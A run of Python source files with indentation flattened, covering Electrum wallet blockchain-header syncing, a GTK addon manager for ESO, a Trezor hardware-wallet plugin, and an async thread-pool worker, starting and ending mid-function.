interface.print_error('wrong header length', interface.request)
self.connection_down(interface.server)
return
header = blockchain.deserialize_header(bfh(hex_header), height)
chain = blockchain.check_header(header)
if interface.mode == 'backward':
can_connect = blockchain.can_connect(header)
if can_connect and can_connect.catch_up is None:
interface.mode = 'catch_up'
interface.blockchain = can_connect
interface.blockchain.save_header(header)
next_height = height + 1
interface.blockchain.catch_up = interface.server
elif chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
assert next_height >= self.max_checkpoint(), (interface.bad, interface.good)
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(self.max_checkpoint(), interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
assert next_height >= self.max_checkpoint()
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // CHUNK_LEN)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as e:
# TODO: py3, get code from e
code = None
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
filename = b.path()
if os.path.exists(filename):
self.set_status("syncing")
with b.lock:
b.update_size(0)
return
def download_thread():
try:
import urllib, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", constants.net.HEADERS_URL)
urllib.request.urlretrieve(constants.net.HEADERS_URL, filename)
except Exception:
import traceback
traceback.print_exc()
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
with b.lock:
b.update_size(0)
self.set_status("syncing")
self.set_status("downloading")
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.is_downloading():
time.sleep(1)
self.print_error("download failed. creating file")
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('height')
hex_header = header.get('hex')
if not height or not hex_header:
return
if len(hex_header) != get_header_size(height)*2:
interface.print_error('wrong header length', interface.request)
self.connection_down(interface.server)
return
header = blockchain.deserialize_header(bfh(hex_header), height)
if height < self.max_checkpoint():
self.connection_down(interface.server)
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
self.print_error(header)
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip +1, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.print_error("switching to catchup mode", tip, self.blockchains)
self.request_header(interface, 0)
else:
self.print_error("chain already catching up with", chain.catch_up.server)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise util.TimeoutException(_('Server did not answer'))
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
def export_checkpoints(self, path):
# run manually from the console to generate checkpoints
cp = self.blockchain().get_checkpoints()
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(cp, indent=4))
def max_checkpoint(self):
return max(0, len(constants.net.CHECKPOINTS) * CHUNK_LEN - 1)
|
addonmanager.py | import gi
gi.require_version("Gtk", "3.0")
import gi
from gi.repository import Gtk, GObject
from addondownloader import AddonDownloader
from pathlib import Path
from threading import Thread
class AddonManagerWindow(Gtk.Window):
adl = None
addons = ""
addons_location = ""
addons_location_field = None
addon_link_textview = None
layout_box = Gtk.Box.new(Gtk.Orientation.VERTICAL, 6)
start_download_button = None
update_ttc_button = None
ttc_eu_radiobutton = None
ttc_us_radiobutton = None
status_label = None
buttons = []
ttc_region = "eu"
def __init__(self):
GObject.threads_init()
super().__init__(title="ESO Addon Manager for Linux")
self.create_addon_files()
self.set_size_request(400, 500)
self.timeout_id = None
self.add(self.layout_box)
self.create_addon_location_field()
self.create_addon_link_textview()
self.create_download_button()
self.create_ttc_radio_buttons()
self.create_download_ttc_button()
self.create_status_label()
self.buttons = [self.start_download_button, self.update_ttc_button]
self.adl = AddonDownloader(self.update_buttons, self.update_status_text)
def create_addon_location_field(self):
label = Gtk.Label(label="ESO Addon folder location")
label.set_line_wrap(True)
self.addons_location_field = Gtk.Entry()
self.addons_location_field.set_text(self.addons_location)
self.layout_box.pack_start(label, False, False, 0)
self.layout_box.pack_start(self.addons_location_field, False, False, 10)
def create_addon_link_textview(self):
label = Gtk.Label(label="Links to ESOUI.com addon pages, one per line")
label.set_line_wrap(True)
scrolledwindow = Gtk.ScrolledWindow()
scrolledwindow.set_hexpand(True)
scrolledwindow.set_vexpand(True)
self.layout_box.pack_start(label, False, False, 0)
self.layout_box.pack_start(scrolledwindow, True, True, 10)
self.addon_link_textview = Gtk.TextView()
self.textbuffer = self.addon_link_textview.get_buffer()
self.textbuffer.set_text(self.addons)
scrolledwindow.add(self.addon_link_textview)
def create_download_button(self):
self.start_download_button = Gtk.Button(label="Download")
self.start_download_button.connect("clicked", self.on_start_download)
self.layout_box.pack_start(self.start_download_button, False, False, 0)
def create_download_ttc_button(self):
self.update_ttc_button = Gtk.Button(label="Update TTC")
self.update_ttc_button.connect("clicked", self.on_start_ttc_update)
self.layout_box.pack_start(self.update_ttc_button, False, False, 0)
def create_status_label(self):
self.status_label = Gtk.Label(label="Ready to download...")
self.status_label.set_line_wrap(True)
self.layout_box.pack_start(self.status_label, False, False, 0)
def create_addon_files(self):
addons_file = open(self.touch_file("addons.txt"), "r+")
addons_location_file = open(self.touch_file("addonslocation.txt"), "r+")
self.addons = addons_file.read()
self.addons_location = addons_location_file.read()
addons_file.close()
addons_location_file.close()
def touch_file(self, filename):
"""Makes sure file exists"""
filename = Path(filename)
filename.touch(exist_ok=True)
return filename
def create_ttc_radio_buttons(self):
self.ttc_eu_radiobutton = Gtk.RadioButton.new_with_label_from_widget(None, "EU")
self.ttc_eu_radiobutton.connect("toggled", self.on_ttc_radio_button_toggled, "eu")
self.layout_box.pack_start(self.ttc_eu_radiobutton, False, False, 0)
self.ttc_us_radiobutton = Gtk.RadioButton.new_with_label_from_widget(self.ttc_eu_radiobutton, "US")
self.ttc_us_radiobutton.connect("toggled", self.on_ttc_radio_button_toggled, "us")
self.layout_box.pack_start(self.ttc_us_radiobutton, False, False, 0)
def on_ttc_radio_button_toggled(self, button, name):
self.ttc_region = name
def update_buttons(self, sensitivity):
for button in self.buttons:
button.set_sensitive(sensitivity)
def update_status_text(self, text):
self.status_label.set_text(text)
def on_start_ttc_update(self, widget):
addons_location_file = open("addonslocation.txt", "w")
addons_location_file.write(self.addons_location_field.get_text())
addons_location_file.close()
adlthread = Thread(target=self.adl.start_ttc_update, args=(self.ttc_region,))
self.handle_thread(adlthread)
def on_start_download(self, widget):
#Save all the input data to text files
#ESO addon location folder
addons_location_file = open("addonslocation.txt", "w")
addons_location_file.write(self.addons_location_field.get_text())
addons_location_file.close()
#List of links
addons = open("addons.txt", "w")
textbuffer = self.addon_link_textview.get_buffer()
start_iter = textbuffer.get_start_iter()
end_iter = textbuffer.get_end_iter()
links = textbuffer.get_text(start_iter, end_iter, True)
addons.write(links.rstrip("\n"))
addons.close()
adlthread = Thread(target=self.adl.start)
self.handle_thread(adlthread)
def handle_thread(self, thread):
thread.daemon = True
try:
self.update_buttons(False)
thread.start()
self.update_buttons(True)
except Exception as err:
self.update_status_text(str(err))
self.update_buttons(True)
|
plugin.py | import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex')[:-1] if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
worker.py | import asyncio
import dataclasses
import itertools
import typing as t
from dataclasses import dataclass, field
from functools import partial
from queue import Empty, SimpleQueue
from threading import Event, ThreadError
from time import monotonic
from hybrid_pool_executor.base import (
Action,
BaseManager,
BaseManagerSpec,
BaseTask,
BaseWorker,
BaseWorkerSpec,
CancelledError,
Function,
Future,
)
from hybrid_pool_executor.constants import (
ACT_CLOSE,
ACT_DONE,
ACT_EXCEPTION,
ACT_NONE,
ACT_RESET,
ACT_RESTART,
)
from hybrid_pool_executor.utils import KillableThread, coalesce, isasync, rectify
NoneType = type(None)
@dataclass
class AsyncTask(BaseTask):
future: Future = field(default_factory=Future)
@dataclass
class AsyncWorkerSpec(BaseWorkerSpec):
max_task_count: int = -1
max_err_count: int = 10
daemon: bool = True
class AsyncWorker(BaseWorker):
def __init__(self, spec: AsyncWorkerSpec):
self._spec = dataclasses.replace(spec)
self._name = self._spec.name
self._loop: t.Optional[asyncio.AbstractEventLoop] = None
self._async_tasks: t.Dict[str, asyncio.Task] = {}
self._current_tasks: t.Dict[str, AsyncTask] = {}
# bare bool vairiable may not be synced when using start()
self._state: t.Dict[str, bool] = {
"inited": False,
"running": False,
"idle": False,
}
self._thread: t.Optional[KillableThread] = None
self._current_task_name: t.Optional[str] = None
@property
def name(self) -> str:
return self._name
@property
def spec(self) -> AsyncWorkerSpec:
return self._spec
def is_alive(self) -> bool:
return self._state["running"]
def start(self):
if self._state["running"] or self._thread is not None:
raise RuntimeError(
f'{self.__class__.__qualname__} "{self._name}" is already started.'
)
self._thread = KillableThread(target=self._run, daemon=self._spec.daemon)
self._thread.start()
# Block method until self._run actually starts to avoid creating multiple
# workers when in high concurrency situation.
state = self._state
while not state["inited"]:
pass
async def _async_run(self):
state = self._state
state["running"] = True
state["idle"] = True
state["inited"] = True
spec = self._spec
worker_name: str = self._name
task_bus: SimpleQueue = spec.task_bus
request_bus: SimpleQueue = spec.request_bus
response_bus: SimpleQueue = spec.response_bus
max_task_count: int = spec.max_task_count
max_err_count: int = spec.max_err_count
max_cons_err_count: int = spec.max_cons_err_count
idle_timeout: float = spec.idle_timeout
wait_interval: float = spec.wait_interval
loop = t.cast(asyncio.BaseEventLoop, self._loop)
async_tasks = self._async_tasks
async_response_bus = asyncio.Queue()
async def coroutine(
task: AsyncTask,
worker_name: str,
bus: asyncio.Queue,
):
result = resp = None
try:
task.fn = t.cast(t.Callable[..., t.Any], task.fn)
result = await task.fn(*task.args, **task.kwargs)
except Exception as exc:
resp = Action(
flag=ACT_EXCEPTION,
task_name=task.name,
worker_name=worker_name,
)
task.future.set_exception(exc)
else:
resp = Action(
flag=ACT_DONE,
task_name=task.name,
worker_name=worker_name,
)
task.future.set_result(result)
finally:
await bus.put(resp)
task_count: int = 0
err_count: int = 0
cons_err_count: int = 0
current_coroutines: int = 0
is_prev_coro_err: bool = False
response = None
idle_tick = monotonic()
while True:
if current_coroutines > 0:
state["idle"] = False
idle_tick = monotonic()
else:
state["idle"] = True
if monotonic() - idle_tick > idle_timeout:
response = Action(flag=ACT_CLOSE, worker_name=worker_name)
break
while not request_bus.empty():
request: Action = request_bus.get()
if request.match(ACT_RESET):
task_count = 0
err_count = 0
cons_err_count = 0
if request.match(ACT_CLOSE, ACT_RESTART):
response = Action(flag=request.flag, worker_name=worker_name)
break
if not state["running"]:
break
try:
while not 0 <= max_task_count <= task_count:
task: AsyncTask = task_bus.get(timeout=wait_interval)
# check if future is cancelled
if task.cancelled:
task_bus.put(
Action(
flag=ACT_EXCEPTION,
task_name=task.name,
worker_name=worker_name,
exception=CancelledError(
f'Future "{task.name}" has been cancelled'
),
)
)
del task
continue
else:
state["idle"] = False
async_task: asyncio.Task = loop.create_task(
coroutine(
task=task,
worker_name=worker_name,
bus=async_response_bus,
)
)
async_tasks[task.name] = async_task
del task
task_count += 1
current_coroutines += 1
except Empty:
pass
await asyncio.sleep(0) # ugly but works
while not async_response_bus.empty():
response = await async_response_bus.get()
await async_tasks.pop(response.task_name)
current_coroutines -= 1
if response.match(ACT_EXCEPTION):
err_count += 1
if is_prev_coro_err:
cons_err_count += 1
else:
cons_err_count = 1
is_prev_coro_err = True
else:
cons_err_count = 0
is_prev_coro_err = False
if (
0 <= max_task_count <= task_count
or 0 <= max_err_count <= err_count
or 0 <= max_cons_err_count <= cons_err_count
):
response.add_flag(ACT_RESTART)
response_bus.put(response)
state["running"] = False
break
response_bus.put(response)
response = None
if not state["running"]:
break
state["running"] = False
for async_task in async_tasks.values():
if not async_task.done():
await async_task
if response is not None and response.flag != ACT_NONE:
if not response.match(ACT_CLOSE, ACT_RESTART):
response_bus.put(response)
else:
await async_response_bus.put(response)
while not async_response_bus.empty():
response = await async_response_bus.get()
response_bus.put(response)
self._thread = None
def _run(self):
self._loop = asyncio.new_event_loop()
self._loop.run_until_complete(self._async_run())
def stop(self):
self._state["running"] = False
if self._thread and self._thread.is_alive():
self._thread.join()
self._thread = None
def terminate(self):
self._state["running"] = False
try:
if self._thread and self._thread.is_alive():
self._thread.terminate()
except ThreadError:
pass
self._thread = None
def is_idle(self) -> bool:
state = self._state
return state["idle"] if state["running"] else False
@dataclass
class AsyncManagerSpec(BaseManagerSpec):
mode: str = "async"
num_workers: int = 1
name_pattern: str = "AsyncManager-{manager_seq}"
# -1: unlimited; 0: same as num_workers
max_processing_responses_per_iteration: int = -1
idle_timeout: float = 60.0
worker_name_pattern: str = "AsyncWorker-{worker} [{manager}]"
task_name_pattern: str = "AsyncTask-{task} [{manager}]"
default_worker_spec: AsyncWorkerSpec = field(
default_factory=partial(AsyncWorkerSpec, name="DefaultWorkerSpec")
)
class AsyncManager(BaseManager):
_next_manager_seq = itertools.count().__next__
def __init__(self, spec: AsyncManagerSpec):
self._spec = dataclasses.replace(spec)
self._default_worker_spec = dataclasses.replace(spec.default_worker_spec)
self._name = self._spec.name_pattern.format(
manager_seq=self._next_manager_seq()
)
self._next_worker_seq = itertools.count().__next__
self._next_task_seq = itertools.count().__next__
self._state: t.Dict[str, bool] = {
"inited": False,
"running": False,
}
self._task_bus = SimpleQueue()
self._response_bus = SimpleQueue()
self._current_workers: t.Dict[str, AsyncWorker] = {}
self._current_tasks: t.Dict[str, t.Any] = {}
self._thread: t.Optional[KillableThread] = None
def start(self):
if self._state["running"] or self._thread is not None:
raise RuntimeError(f'ThreadManager "{self._name}" is already started.')
self._thread = KillableThread(target=self._run, daemon=True)
self._thread.start()
state = self._state
while not state["inited"]:
pass
def is_alive(self) -> bool:
return self._state["running"]
def _run(self):
state = self._state
state["running"] = True
state["inited"] = True
metronome = Event()
wait_interval: float = rectify(coalesce(self._spec.wait_interval, 0.1), 0.1)
idle_timeout: float = rectify(coalesce(self._spec.idle_timeout, 60), 60)
num_process_limit: int = rectify(
coalesce(self._spec.max_processing_responses_per_iteration, -1), -1
)
current_tasks = self._current_tasks
response_bus = self._response_bus
idle_tick = monotonic()
while True:
if not current_tasks and response_bus.empty():
if monotonic() - idle_tick > idle_timeout:
break
else:
idle_tick = monotonic()
if not state["running"]:
break
num_processed: int = 0
while not response_bus.empty():
self._consume_response()
num_processed += 1
if num_processed >= num_process_limit:
break
if num_processed == 0:
metronome.wait(wait_interval)
state["running"] = False
while not response_bus.empty():
self._consume_response()
self._stop_all_workers()
self._thread = None
def _stop_all_workers(self):
stop_action = Action(ACT_CLOSE)
for worker in self._current_workers.values():
worker.spec.request_bus.put(stop_action)
for worker in self._current_workers.values():
worker.stop()
def stop(self, timeout: float = 5.0):
self._state["running"] = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=rectify(coalesce(timeout, 5.0), 5.0))
self._thread = None
def terminate(self):
self._state["running"] = False
try:
if self._thread and self._thread.is_alive():
self._thread.terminate()
except ThreadError:
pass
self._thread = None
def get_worker_spec(
self,
name: t.Optional[str] = None,
daemon: t.Optional[bool] = None,
idle_timeout: t.Optional[float] = None,
wait_interval: t.Optional[float] = None,
max_task_count: t.Optional[int] = None,
max_err_count: t.Optional[int] = None,
max_cons_err_count: t.Optional[int] = None,
) -> AsyncWorkerSpec:
if name and name in self._current_tasks:
